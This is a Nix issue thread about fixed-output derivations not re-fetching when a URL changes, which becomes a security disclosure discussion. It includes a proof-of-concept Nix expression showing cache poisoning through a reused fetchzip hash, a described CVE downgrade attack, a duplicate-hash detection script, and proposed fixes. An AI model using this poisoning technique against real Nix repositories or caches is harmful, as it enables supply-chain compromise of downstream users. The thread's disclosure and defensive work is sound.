re-fetch source when url changes #969

magnetophon · 2016-07-13T00:35:55Z

Currently the source is only re-fetched when the hash changes.
When you use nix-env -i to find the new hash, but forget to make a change to the hash, you are stuck with the wrong source.

To add injure to insult: the source is then not re-fetched when you change the hash: you first have to garbage-collect the old source.

The text was updated successfully, but these errors were encountered:

domenkozar · 2016-07-13T11:47:43Z

In fixed-output derivations, the hash is content addressed. We could get URL to be part of the hash, but then mirror/url change would trigger a rebuild, which is very unfortunate.

I propose you change the workflow how you change sources, but I realize that's poor UX.

copumpkin · 2016-07-13T11:58:12Z

I want to better understand the "stuck with the wrong source" thing you mention because I haven't experienced it, but otherwise I'm basically with @domenkozar on this. I don't like the usability aspects either, but I don't know how to retain the nice content-centric properties without something like this.

One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash. This could be stored as a very simple "output-hash -> regular-derivation-hash" KV mapping. Then it could simply warn you that it's seeing the same output hash coming from a different derivation, which isn't necessarily an error but might be interesting to the user.

magnetophon · 2016-07-13T12:10:00Z

@domenkozar: Could you expand on "I propose you change the workflow how you change sources, but I realize that's poor UX."?

@copumpkin: What I mean is: nix wil write the old source in the store, under the new name.

It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.

@ the both of you: it seems this issue is not as easy to fix as I hoped.
Feel free to close it if you want.

copumpkin · 2016-07-13T12:23:50Z

What I mean is: nix wil write the old source in the store, under the new name.
It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.

I'm confused. The way Nix thinks about fixed-output derivations is as follows:

The content + the derivation name (which in some cases isn't provided by the user) are the only things that identify the data in the store.
The other stuff like the URL for fetchurl or the git repo specs for fetchgit, and basically all the scripts that call git or curl or whatever are "hints" for how to produce the content in (1). If the content already exists, the scripts won't be run. If the content doesn't exist, and the script produces data with a different hash, Nix will complain that the hash doesn't match and quit.

So here are the scenarios I can think of:

Content not in store, and you change the hash without changing e.g., the url for fetchurl: Nix will fetch the original URL, check it against the new hash you changed, and complain that the hashes don't match.
Content not in store, and you leave the original hash alone: Nix will fetch the original URL, check against the correct hash, and add the result to the store because they match.
Content in store, and you change the hash without changing the URL: Nix will fetch the original URL, check it against the new hash, and complain that the hashes don't match.
Content in store, and you change the hash and change the URL: Nix will fetch new URL, check against new hash, and accept the new content.

It sounds like you're saying (3) is leaving junk in the store that's identified with the new hash but contains the old data, but that doesn't fit with my understanding of how things work. What am I missing?

magnetophon · 2016-07-13T12:42:19Z

@copumpkin: I'm talking about when you change the version (or name in general) of the pkg and the url, but not the hash.
afaik in that case it doesn't matter if the content is already in the store, it'll be stored under the new name.

Sorry for the confusion, hope I'm clear now.

veprbl · 2016-07-17T17:45:04Z

I see the opposite in my tests:

Welcome to Nix version 1.11.2. Type :? for help.

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/6zh44fbv7agc7n7il0wprzg6hv1khwha-test.tar.gz.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/zbajq1zcsz90z8dnnfxfi5d1a36kk17l-test.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/dvhk6cw4am7r9rgyjb1q7rwqdww6cns7-test.drv»

I would think that nix shouldn't care about url change as long as the hash stays the same. But in reality the change of the url gives me both redownload and (massive) rebuild.

domenkozar · 2016-07-21T12:29:19Z

@veprbl we're talking about the realized derivation hash, not the derivation hash itself.

freeman42x · 2018-02-03T07:05:23Z

@magnetophon

I was getting:

nix-store --delete /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
error: cannot delete path ‘/nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16’ since it is still alive

I run:

nix-store -q --roots /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16

And deleted the results folder mentioned by previous command.

After that nix-build picked up the hanged URL.

stale · 2021-02-15T18:49:07Z

I marked this as stale due to inactivity. → More info

hab25 · 2023-12-22T19:15:51Z

I marked this as stale due to inactivity. → More info

To remove the stale label, just leave a new comment.

tobiasBora · 2024-02-12T10:17:17Z

I was thinking, would it make sense to add an option like --force-redownload that would try to redownload the source of the currently built package, and double check if the hash corresponds? It could help people to quickly check if the hash in a derivation is correct. (EDIT: actually, I think the current behavior brings some security issues, let me test it first)

lolbinarycat · 2024-03-07T04:22:46Z

One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash.

doesn't nix already track this for garbage collection purposes? nix-store -q --deriver and nix-store -q --valid-derivers should give you enough information to triangulate this.

tobiasBora · 2024-04-29T18:25:56Z

I can confirm that this bug can lead to some security issues, described in an email sent to the security team (I'll likely create a public issue soonish). Other potential attacks (if other functionalities like cache sharing between Ofborg and reviewers/hydra is implemented) are described in NixOS/ofborg#68 (comment)

What I propose to solve this is to keep on each nix installation a map URL -> hash (or rather, as suggested by Linus in a private email, a map derivation -> hash since fixed-output derivations might be much more general than downloading a file). For any fixed-output derivation, if hash is already present on the system, it should first check if the url/derivation is also contained in the database with the appropriate hash. If not, it should re-execute the derivation, check if the hash is correct, and if so continue from the cached value.

EDIT: See my proposition here NixOS/ofborg#68 (comment) for a more robust version

oxij · 2024-05-06T15:28:42Z

@tobiasBora After @risicle pointed me your way in NixOS/rfcs#171 (comment), and after reading your comments in NixOS/ofborg#68 I came up with a very simple currently undetectable way to poison Hydra's cache in NixOS/rfcs#171 (comment):

But now thinking about this, I have an IMHO much simpler and thus scarier attack that _will_ work against Hydra: - Malice makes an evil PR with a package update that changes the source's revision to a new version but points the hash to a hash of an older version of the same package, a version which has a well-known CVE. - A very paranoid Nixpkgs maintainer Alice (who does not use any build caches) looks at it, it looks fine, so she builds it, and it works fine, since Alice has the older version of the source in `/nix/store`, and so she merges it. - All tools that track unfixed CVEs in Nixpkgs only look at package versions, so those will be fooled too. - Malice can now exploit the CVE.

So, this is actually a critical bug. Merging NixOS/nixpkgs#49862, setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default, and banning of customly-named source derivations is a workaround that will work in the meantime.

tobiasBora · 2024-05-06T15:42:26Z

Yes, I actually realized exactly this morning this issue with fetchzip and transmitted a MWE to the security team showing that one can use the code of any package controlled by an adversary to inject code into any another package, exploiting the fact that fetchzip removes the package name & version in the attribute name, making the attack trivial to carry: the difference between a malicious & honest derivation is juts one hash.

As a result, I submitted a CVE online.

Patching fetchzip as discussed in NixOS/rfcs#171 is only a first step but does not stop the slightly more involved cache poisoning attacks. The only robust fix I can think of is what I am proposing in NixOS/ofborg#68 (comment)

Merging NixOS/nixpkgs#49862, setting nameSourcesPrettily = true or nameSourcesPrettily = "full" by default, and banning of customly-named source derivations is a workaround that will work in the meantime.

That might be a first quick mitigation (actually not needed if we implement NixOS/ofborg#68 (comment)), but not something sufficient. Nobody would realize if a derivation is misnamed, for instance in a long "automatically generating" file.

oxij · 2024-05-06T21:04:54Z

The only robust fix I can think of is what I am proposing in NixOS/ofborg#68 (comment)

While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it. I.e. you are trying to prevent poisoning of your local `/nix/store` with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) `/nix/store` directly too by reusing old hashes.

Merging NixOS/nixpkgs#49862, setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default

is one work-around for this. As hinted in NixOS/rfcs#171 (comment), making `nix-store -r --check` semantics slightly more convenient: - for a normal derivation, when the `outPath` is valid it should build the derivation again and check the result matches the previously known output exactly (as it does now), - for a normal derivations, when the `outPath` is not valid, it should just build the derivation twice and compare the results (the current semantics of failing in this case is surprising and inconvenient), - for a fixed-output, regardless of `outPath` validity, it should always do the build and then check the hash, and then making OfBorg always run `nix-store -r --check` for all affected fixed-output derivations, thus limiting the set of attackers who could poison caches and `/nix/store`s to those who have direct commit access to Nixpkgs, is another work-around for this. But the actual solution is to never reuse outputs between derivations without checking them first, i.e. Nix should remember a mapping of `outPath -> set<drvPath>` for each valid `outPath` in `/nix/store` (ATM Nix only stores one `drvPath` for each valid `outPath`, aka `nix-store -q --deriver`) and `nix-store -r` should force re-build (i.e. `--check`) each given derivation even if the corresponding `outPath` already exists and is valid in `/nix/store` in cases when that `outPath` does not have that `drvPath` in its `set<drvPath>` yet. In other words, `/nix/store` path validity should be changed from being a flag ("is valid") to a predicate ("is valid as an output for this `drvPath`). Similarly, substitutors should provide their `set<drvPath>` for each requested `outPath` to the client Nix'es (somehow) and a client Nix should check those before accepting a substitution. Obviously, without any optimizations that would be incredibly inconvenient, as, among other things, not only changes to URLs and changes between `fetch*` functions would always cause a rebuild, but also any unrelated changes to `stdenv.mkDerivation` would cause all derivations using any of the `fetch*` functions to be rebuilt too. One possible way to minimize rebuilds in this case is to implement a tiny `mkDerivationLite` variant of `stdenv.mkDerivationLite` and use that in all `fetch*` functions. Sure, updating `curl` or `git` will still cause a lot of rebuilds, but for the paranoid this could be a good thing: after all, what if the attacker poisoned one of those somehow. Another way to reduce rebuilds with `drvPath`-predicated-validity is to add a new `outputPathToken` parameter to `derivation` which would declare to Nix that the `outPath` of this derivation is valid for any other derivation that maps to the same `outPath` and uses the same `outputPathToken`, i.e. it would declare an equivalence class of valid `drvPath`s for each `outPath` (i.e., in the above, `set<drvPath>` becomes `set<drvPath or outputPathToken>`). Then, - the current minimal-rebuilds behavior can be archived by always setting `outputPathToken` to some constant, - keeping `outputPathToken` always unset will get you the most paranoid behavior at the cost of most rebuilds, - precise control of what should or should not be rebuilt on changes to fixed-output derivations can be archived by setting `outputPathToken` to different things in different `fetch*` derivations, e.g. - set `outputPathToken` to the `"fetchurl " + concatSepBy " " (sort urls)` in `fetchurl` so that changes to URLs would cause rebuilds, - set it to `"fetchgit " + url + " rev " + rev` in `fetchgit` so that changes to URLs and revisions would also cause rebuilds, - etc. `nix.conf` could then provide an option to ignore all `outputPathToken` options, for the most paranoid.

tobiasBora · 2024-05-07T07:51:18Z

I've to admit I don't yet fully grasp all your proposition, but here are a few comments after a first reading:

While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.

Well, I precisely want nix to implement it. All other solutions would either not work or require the user to do massive downloads (if the data don't exist, you have no other way than regenerating it yourself) to check all FOD, which can lead to many issues. Not only the user would need to download the (transitive) sources of all packages they want to install, even if they only care about the final binary, by if the source is not available anymore at its current location then the user would not even be able to install the binary (and the security team mentioned me that they don't want to go this path as it used to be this way and created many issues).

I.e. you are trying to prevent poisoning of your local /nix/store with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) /nix/store directly too by reusing old hashes.

If one changes nix the way I propose, I don't see how anyone could poison Hydra's cache (of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons). The new derivation -> hash map is precisely used to say "Hydra checked that this FOD derivation evaluates to hash", i.e. "no poisoning has been done on this derivation". In particular, old hashes would NOT be part of this trusted map until Hydra checks that they are indeed correct.

setting nameSourcesPrettily = true or nameSourcesPrettily = "full" by default is one work-around for this.

I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance to be sure it is in Hydra' cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.

Nix should remember a mapping of outPath -> set<drvPath> for each valid outPath in /nix/store

I think this is more or less what I proposed, just the maps is in the other way around as I was proposing instead drvPath -> outPath & I also propose to let cache.nixos.org/… share this map.

One possible way to minimize rebuilds […]

What do you call a rebuild here? Is it in the sense that:

the FOD output should be re-checked by Hydra, to complete the map drvPath -> outPath (which indeed should be done by hydra if the fetch* function change, and I guess having a lite version of mkDerivation makes sense if these often change)
the FOD output should be re-checked by the end user: this should NOT be the case, at least if hydra already did it before and if we implement the sharing of drvPath -> outPath I was proposing above
the whole world should be rebuilt: this should NOT be the case, once the user is assured that the hash is correct they can use the old derivation as before.

oxij · 2024-05-07T09:53:51Z

(of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons)

What reasons? If I'm not using the Hydra binary cache and I'm not using the default bootstrap tarballs what is there to trust? Tarballs downloaded from Hydra tarball cache get hashed and checked against hashes in their derivations locally, as they should.

I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance to be sure it is in Hydra' cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.

Putting the whole revision or hash into the source derivation name and banning of customly-named `fetch*` derivations will make that attack impossible. But even without the first part (and with `<hash>-<name>-<version or short revision>-source` scheme), sure, in theory, the attacker could still poison it by pre-`fetch*`ing an evil source in an autogenerated files with the same derivation name if the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never. And then, users like me, that do not build anything from those huge autogenerated files and are not using Hydra binary cache will catch those mis-hashes immediately. I'm running with NixOS/nixpkgs#49862 and `nameSourcesPrettily = "full"` enabled since 2018 (essentially, implementation details changed over time, but the behavior did not). Do I use a small subset of Nixpkgs? Yes. Do source URLs still fail to fetch sometimes? Yes. But usually things are pretty easy to fix, and older source versions usually can be found on archive servers without changes to any hashes. But now, remembering the uncountable number of times I had to fix fixed-output hashes locally to make my systems build I'm feeling kind of paranoid. Were all those outputs mis-hashed in honest error or were some of them attempts to poison something? Some of those mis-hashes persisted for months in `master` while I was too annoyed with the PR process, thinking them honest errors that would be fixed eventually by people with direct commit access. Was something poisoned already?

... implementation ... I think this is more or less what I proposed, just the maps is in the other way around as I was proposing instead `drvPath -> outPath` & I also propose to let cache.nixos.org/… share this map.

Yes, algorithmically, we are proposing the same thing, but I'm essentially proposing we reuse the existing Nix derivers mechanism for this and while you are talking about how to make Hydra publish its derivers and make Nix use them, I'm pointing out that Hydra publishing its derivers is not enough: if Hydra does not have the output in its cache yet, then the user will have to `--fallback` build locally, meaning local Nix will have to do the check too, which means checking that the source derivation is in checked derivers set of that output, which would frequently fail, which would mean frequent mass rebuilds, and so I'm proposing a way to minimize those, and `outputPathToken` is a clever and simple solution, IMHO. Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed.

> One possible way to minimize rebuilds […] What do you call a rebuild here? Is it in the sense that: - the FOD output should be re-checked by Hydra, to complete the map `drvPath -> outPath` (which indeed should be done by hydra if the `fetch*` function change, and I guess having a lite version of `mkDerivation` makes sense if these often change)

I.e., in the terminology I use in my proposal, you are stating that Nix should ask its substitutors for their derivers set for the `outPath` it tries to substitute and then check that source derivation is in that set. To which I agree.

- the FOD output should be re-checked by the end user: this should NOT be the case, at least if hydra already did it before and if we implement the sharing of `drvPath -> outPath` I was proposing above

Sure, if substitutors are enabled, then Nix should only do "member in a set" check, not a full derivation rebuild (i.e. `nix-store -r --check`, which is what I call a "rebuild", because `nix build --rebuild` does it).

- the whole world should be rebuilt: this should NOT be the case, once the user is assured that the hash is correct they can use the old derivation as before.

But if the user does not use Hydra, and `curl` changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.

tobiasBora · 2024-05-10T17:29:45Z

What reasons?

Anyone relying on cache.nixos.org (which is likely 99% of users) need to trust Hydra, as if it can always inject malicious code inside the final binary… Like Debian users need to trust Debian maintainers. And I don't see how checking the hash can help here, programs are not FOD and their hash may vary across builds in general, so until we have succinct verifiable honest proof of compilation (which, let's be honest, is never going to happen) or at least 100% reproducible builds, we need to trust hydra.

Anyway, the attack I describe would also apply to people NOT using hydra, so building everything from source will not help since it will pick the wrong source.

If the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.

I think you misunderstand the attack I have in mind. What I describe allows any adversary to inject arbitrarily malicious code (irrespective of the fact of whether the actual program will have a CVE or not) in a future release of any program, assuming they can simply guess the name of the release… which is trivial (these usually simply increase one by one and are often pre-released in an alpha form like 3.42-alpha.

But now, remembering the uncountable number of times I had to fix fixed-output hashes locally

Is it really an experience we want for nix end users?

Was something poisoned already?

Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large so I used a script to help me to discard the good looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.

which would mean frequent mass rebuilds

I don't see why we would get more rebuilds than now. If a program is in the cache, Hydra already downloaded its source, so the user can rely on Hydra's map. If Hydra has not built the package yet… anyway the user needs to rebuild everything. And if the package is a "legacy package" in the sense that it was built by Hydra before we even started to add this option, what I propose (maybe what you propose as well, not sure to understand all details) allows the user to only download & check the source while using the binary compiled by Hydra (which saves most of the time-consuming part).

Precise formats of outputPathToken for different fetch*ers and their security implications could and should be discussed.

I'm not sure to understand all details of your proposition here (maybe because I lack some knowledge of nix's internals) but I think I get the big picture. I think creating equivalent classes of derivations (which, I think, could be a nice concept in general in nix) could be a nice way to limit rebuilds in case of curl updates… but your implementation with outputPathToken raises a number of questions, including in term of security:

how can we enforce that a FOD cannot change their own outputPathToken? If any derivation & fetcher can set this option (as it is the case for now as I understand it), this provides basically no additional security as the attacker could always submit an obfuscated FOD that sets outputPathTokens to the one used in fetchgit/… So for this to work outputPathToken must be added by a new mechanism in nix, and not via the usual derivation.
the outputPathToken should be an indication of the fetcher, but nix should provide command line options to follow or not these recommendations from the fetcher (either in a more or less paranoid way)
if my understanding is correct, outputPathToken alone is not sufficient as it does not assert that the hash is correct. Notably, if I try to execute a derivation, and realize that the provided hash is not correct, one MUST REMOVE this derivation from /nix/store, otherwise we will have no way of knowing if a derivation really evaluates to a given hash.

So based on the first point, since it seems hard to only allow specify fetchers to create a given outputPathToken (unless you know some special tricks?), and since anyway a new nix concept must be introduced, we can maybe deal with this by creating a new kind of derivation that specifies what must be downloaded and not how to obtain it as it is the case for now. For instance, one could create a derivation like:

Derive([
  "kind": "fetchurl",
  "url": "myurl",
  "out": "/nix/store/foo.tar.xz",
  "sha256", "somehash"
])

and nix should automatically understand that when receiving this derivation, it should download the url, using any CURL version they want as soon as the hash matches at the end. If we don't want to hardcode all of them in nix itself (let's try to keep nix small), we can let nix take as input a special nix file trusted-fetchers.nix containing all the "trusted fetchers". This could be a map like kind -> fetcher, such that when nix encounters a custom derivation they are not able to evaluate, nix would resort instead to using the fetcher in the map. This means that we only need to check trusted-fetchers.nix instead of nixpkgs in its totality.

More specifically, fetcher could be a function taking as input the above derivation, and outputting a bit Ok/Not ok (and possibly an error message) and a folder, such that the folder is kept in out by nix iff the bit is true (this bit would be intuitively like "I checked that the hash is correct").

This idea of equivalence of fetchers can certainly be used to also solve other issues with non-deterministic processes. For instance, for now we have no solutions to avoid hash shift with leaveDotGit = true;: NixOS/nixpkgs#8567 and certainly many other package-manager things. One option here would be to create a derivation:

Derive([
  "kind": "fetchgit",
  "url": "git repo",
  "leaveDotGit": true,
  "out": "/nix/store/foo.tar.xz",
  "sha256", "somehash"
])

where the hash only corresponds to the "stable" part of the package, i.e. what is outside .git. The fetcher would then run git clone to clone the package, compute the hash of the "valid" part, and output "OK" if this hash is valid.

But if the user does not use Hydra, and curl changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.

Well, checking the source, I agree it's nice to have… but no need to recompile programs.

oxij · 2024-05-15T10:11:37Z

Well, checking the source, I agree it's nice to have… but no need to recompile programs.

Most of my mentions of "rebuild" above imply the context of "rebuild the source (`<name>.src`) derivation". Package derivations (`<name>`) should not be rebuilt, of course.

> What reasons? Anyone relying on `cache.nixos.org` (which is likely 99% of users) need to trust Hydra... ... Anyway, the attack I describe would also apply to people NOT using hydra, so building everything from source will not help since it will pick the wrong source.

My point exactly. Some users have personal and/or shared build machines, and `/nix/store`s on those can be poisoned too. So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.

> If the attacker manages guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never. I think you misunderstand the attack I have in mind. ...

I'm referencing the exploit described in #969 (comment) there.

> But now, remembering the uncountable number of times I had to fix fixed-output hashes locally Is it really an experience we want for nix end users?

Well, those hashes are factually wrong, either in honest error, on in malice. That's just the reality of the situation. If Hydra or OfBorg verified them all, then those packages would have been fixed in `master` instead of in my local branches.

> which would mean frequent mass rebuilds I don't see why we would get more rebuilds than now.

In the context I discuss there, say `curl` changes, now all `<name>.src` derivations that use `fetchurl` have to be rebuilt.

> Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed. ... trusted fetchers ...

Hmm, that's a good point. Specifically, yes, `outputPathToken`s is probably not a good solution when the attacker can also modify the `fetch*` derivations themselves, so it would at the very least still leave OfBorg vulnerable.

``` Derive([("out", "/nix/store/foo.tar.xz", "sha256", "somehash")], [ "kind": "fetchurl", "url": "myurl", ]) ```

Making full-featured `curl` into a Nix builtin is a possibility (as opposed to `fetchurlBoot` that exists now), but what about derivations fetched with `curl` and then unpacked with `zip` (like `fetchFromGitHub`)? Should `zip` be a builtin too? What about those fetched with `git`? Even if it's just `curl` and `zip`, you'd have also make Nix depend on SSL CA's to verify HTTPS certs, otherwise the hashes could be poisoned on your developer machine by MITMing your Nix HTTP traffic, and ca-certs derivation is also non-trivial. Also, at the moment Nix built with all the optional things disabled is pretty small and can be used for minimal self-bootstrap, requiring all those things will make things harder. So: Is it possible to do? Yes. Is it a desirable solution? Probably not.

> Was something poisoned already? Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large so I used a script to help me to discard the good looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.

How are you doing this, exactly? Are you parsing Nix files by hand? `nix-env -f ./default.nix -qa --argstr system "x86_64-linux" --attr-path --drv-path --out-path` gives the output that has the right data (after all, we need to check that different `--attr-path`s don't reuse or downgrade `--out-path`s), but it only evaluates package derivations, not source derivations. If it did, running that on successive revisions of Nixpkgs, parsing the outputs, building a DB from the results, and then printing `--out-path` reuses and downgrades would be a good first step. (Expensive to do, though. Especially since I don't have enough memory to evaluate all of Nixpkgs in a single run of `nix-env -qa` already, and evaluating a subset is kinda useless, given that any of the autogenerated package sets can be poisoned.) I guess, the simplest way to do this, cheaper than doing `nix-env -qaP` followed by `nix-instantiate -A` on all `--attr-path`s, and then `nix-store -q --requisites`, followed by parsing the `.drv` files manually (which would be crazy expensive to do and will also torture your SSD) would be implementing `nix-env -q --all` option so that `nix-env -f ./default.nix -q --all --argstr system "x86_64-linux" --attr-path --drv-path --out-path` would print that data for _all_ `derivation`s Nix encounters while doing evaluations, not only the ones `--available` from the current Nix expression. My ability to patch Nix sources is fairly superficial ATM and I don't really care for this much, given that NixOS/nixpkgs#49862 with a small custom-name-warning change on top basically solves the problem for me (given that I don't use Hydra). But it would be nice if someone could implement that `nix-env -q --all` and then possibly somebody else would share all those evaluations on a bunch of revisions of `master`, so that we could check if Hydra and all users using it were PWNed yet.

nixos-discourse · 2024-05-20T14:26:28Z

This issue has been mentioned on NixOS Discourse. There might be relevant details there:

https://discourse.nixos.org/t/nixpkgs-supply-chain-security-project/34345/19

tobiasBora · 2024-05-21T08:43:52Z

I'm not sure why my last answer has not been posted. In the meantime the CVE got published at https://nvd.nist.gov/vuln/detail/CVE-2024-36050

Package derivations (<name>) should not be rebuilt, of course.

Good, just wanted to be sure we are on the same basis.

So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.

Definitely agree. My point was just to try to reduce the amount of downloaded materials from the user perspective using the cache when available, otherwise users (especially those with little bandwith) would suffer a lot, and if the source is changed they would get 404 error even if it is still cached.

I'm referencing the exploit described in #969 (comment) there.

I show here a much more generic attack https://github.com/leo-colisson/CVE_NixOs_cache_spoil/ with some variants using fetchurl instead of fetchzip etc. For instance, this:

{ pkgs ? import <nixpkgs> {} }:
pkgs.callPackage ({stdenv, fetchzip}:
  let iconpackage = stdenv.mkDerivation rec {
        pname = "iconpackage";
        version = "42.0";
        src = fetchzip {
          url = "http://localhost:8042/iconpackage-${version}.tar.gz"; # <-- this is controlled by the adversary
          sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
        };
        buildPhase = ":";
        installPhase = ''
          mkdir -p $out/share/icons/hicolor/64x64/apps/
          mv myicon.png $out/share/icons/hicolor/64x64/apps/
        '';     
      };
      honestpackage = stdenv.mkDerivation rec {
        pname = "honestpackage";
        version = "1.0";
        src = fetchzip {
          url = "http://localhost:8042/honestpackage-${version}.tar.gz"; # <-- this is NOT controlled by the adversary
          sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
        };
        buildInputs = [ iconpackage ];
        buildPhase = ":";
        installPhase = ''
          mkdir -p $out/bin
          mv honestpackage.sh $out/bin
        '';
      };
  in honestpackage
) {}

Would result in:

$ nix-build
$ ./result/bin/honestpackage
I am malicious >:-|

In the context I discuss there, say curl changes, now all <name>.src derivations that use fetchurl have to be rebuilt.

Yeah I see now, hence my proposition to have trusted fetchers.

Specifically, yes, outputPathTokens is probably not a good solution when the attacker can also modify the fetch* derivations themselve

Well, they can always do that, for instance by implementing their own FOD derivation, without even relying on a pre-existing fetch* at all.

Making full-featured curl into a Nix builtin is a possibility (as opposed to fetchurlBoot that exists now), but what about derivations fetched with curl and then unpacked with zip […] Is it possible to do? Yes. Is it a desirable solution? Probably not.

That's precisely why I don't want to include this in Nix directly, but provide to nix a trusted-fetcher.nix file via a command line like $ nix --trusted-fetchers trusted-fetchers.nix or simply by picking this file automatically by default. One needs to think carefully about this file, but after a quick thought, it could look like:

{pkgs, ...}: {
  "fetchurl" = {
    args = [ "url" ];
    script = "
      ${pkgs.curl}/bin/curl "$url" -O $tmpOut
      ${pkgs.sha256sum}/bin/sha256sum $tmpOut > $tmpOutSha
    ";
  };
}

This way, when a user calls fetchurl { url = "https://foo.com"; hash = "somehash"; } it would create a derivation like:

Derivation({
  "trustedFetcher": "fetchurl",
  "url": "https://foo.com",
  "hash": "somehash"
})

(see that it is agnostic of curl's version), and to execute it, nix would pick the appropriate fetcher in trusted-fetchers.nix (unless it is already present in the cache), run the corresponding script, and compare at the end the content of $tmpOutSha with the hash in the derivation. If they match, the it derives from the hash of the derivation the final $out and copies $tmpOut to this path.

How are you doing this, exactly? Are you parsing Nix files by hand?

Right now this is made in a very dirty way, via a simple grep (install ripgrep):

import subprocess
import os
import re

for line in os.popen("rg -o 'hash = \".*\"' --no-filename | sort | uniq -c | sort -hr | rg -v \"1 hash\" | rg -o '\".*\"'").readlines():
    print(f"==={line}")
    output = os.popen(f"rg -F '{line.strip()}' -C 5").read()
    res = re.findall(r'owner ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The owner appears twice, sounds good enough here")
        continue
    res = re.findall(r'url ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The url appears twice, sounds good enough here")
        continue
    print(output)
    print("===================================================================\n\n\n")

You can see that the number of duplicated hashes is quite large (155), so I try to discard some of them automatically, for instance if I see the same url twice around the good lines, but this is very dirty, and I don't consider this as any good security measure. Even with this sorting there is quite a lot of entries to manually read, so it would be better to actually extract all such fetch*, and try to run them (without using the local cache of course, not sure how to do) and see if the hash is actually correct…

changlinli mentioned this issue May 13, 2017

fetchgit no longer complains when rev/hash don't match NixOS/nixpkgs#25755

Open

freeman42x mentioned this issue Feb 3, 2018

AntTweakBar: init at 1.16 NixOS/nixpkgs#34540

Merged

2 tasks

shlevy added the backlog label Apr 1, 2018

shlevy assigned copumpkin Apr 1, 2018

danieldk mentioned this issue May 19, 2019

fetchFromGitHub allows hash and content specified to diverge NixOS/nixpkgs#61690

Closed

domenkozar removed the backlog label Apr 30, 2020

Ma27 mentioned this issue Jul 20, 2020

fetchurl: output not reproducible NixOS/nixpkgs#93518

Closed

stale bot added the stale label Feb 15, 2021

baracoder mentioned this issue Jun 23, 2021

nvidia_x11_beta: 465.31 -> 470.42.01 NixOS/nixpkgs#127812

Merged

11 tasks

fricklerhandwerk added UX The way in which users interact with Nix. Higher level than UI. cli The old and/or new command line interface and removed cli The old and/or new command line interface labels Sep 12, 2022

7c6f434c mentioned this issue Mar 8, 2023

Bypass store object reuse when FODs change source description #7999

Open

stale bot removed the stale label Dec 22, 2023

lolbinarycat mentioned this issue Mar 8, 2024

Automatic finalAttrs pattern migration NixOS/nixpkgs#293452

Open

tobiasBora mentioned this issue Apr 29, 2024

Provide a binary cache for builds NixOS/ofborg#68

Open

oxij mentioned this issue May 6, 2024

[RFC 0171] Default name of fetchFromGithub FOD to include revision NixOS/rfcs#171

Closed

ShamrockLee mentioned this issue May 9, 2024

